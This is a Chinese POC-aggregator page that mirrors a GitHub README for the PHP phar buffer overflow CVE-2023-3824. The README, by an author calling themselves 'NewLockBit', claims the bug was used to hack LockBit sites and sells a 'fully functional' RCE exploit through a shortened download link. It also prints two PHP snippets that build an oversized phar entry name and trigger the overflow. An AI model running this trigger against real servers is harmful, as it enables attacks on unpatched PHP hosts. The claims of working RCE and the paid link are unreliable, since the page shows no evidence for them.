POC详情: c33c731ce896a4870355228454dd73a5f2dc819d

来源
https://github.com/StayBeautiful-collab/CVE-2023-3824-PHP-to-RCE-LockBit-LEAK
关联漏洞
标题: PHP 缓冲区错误漏洞 (CVE-2023-3824)
描述:PHP是一种在服务器端执行的脚本语言。 PHP存在安全漏洞,该漏洞源于函数phar_dir_read()存在缓冲区溢出漏洞,该漏洞会导致内存损坏或远程代码执行(RCE)。受影响的产品和版本:PHP 8.0.30之前的8.0版本,8.1.22之前的8.1版本,8.2.8之前的8.2版本。
介绍
# CVE-2023-3824-PHP-to-RCE-LockBit-LEAK


Greetings to anyone interested in how several LockBit sites were hacked by PHP CVE-2023-3824. 

(**download exploit** below)

Now I write this POC in Python 3.9. This POC is fully finalized and functional. I'm willing to share this exploit for a nominal fee to avoid mass distribution and hacking of most sites written in PHP.

## Download
[Download here](https://t.ly/akOKg)

This repository contain instructions for running it, a description of the vulnerability, payload in php 8.0 and the exploit.py in Python 3.9.


## What happened (About POC)
Below is a screenshot of what I am talking about. 

![image](https://github.com/NewLockBit/CVE-2023-3824-PHP-to-RCE-National-Crime-AgencyLEAK/assets/162780018/541ebeb0-eb06-4bc4-889e-a29326df4b37)

![image](https://github.com/NewLockBit/CVE-2023-3824-PHP-to-RCE-National-Crime-AgencyLEAK/assets/162780018/37b75207-4fdd-4c1f-bf67-90053dd19442)


At the link you can read about how it went down.
(https://www.thestack.technology/coalition-calls-time-on-lockbit-ransomware-gang/)


## Details of CVE-2023-3824
CVE-2023-3824 was found in PHP version 8.0.* before 8.0.30,  8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or **RCE**.

This vulnerability works due to buffer overflow and overread in phar_dir_read() function.

I have written a POC. Here is a short version of it:

### PoC
Create the malicious Phar file using:

```
<?php
$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString(str_repeat('A', PHP_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar->stopBuffering();
?>
```
Trigger the buffer overflow and overread using this script:
```
<?php
$handle = opendir("phar://./malicious.phar");
$x = readdir($handle);
closedir($handle);

var_dump($x);
?>
```


Author: NewLockBit

Date of published: 2024/03/09
文件快照

 [4.0K]  /data/pocs/c33c731ce896a4870355228454dd73a5f2dc819d
├── [2.6K]  cve-2023-3824-php-rce.py
└── [2.0K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。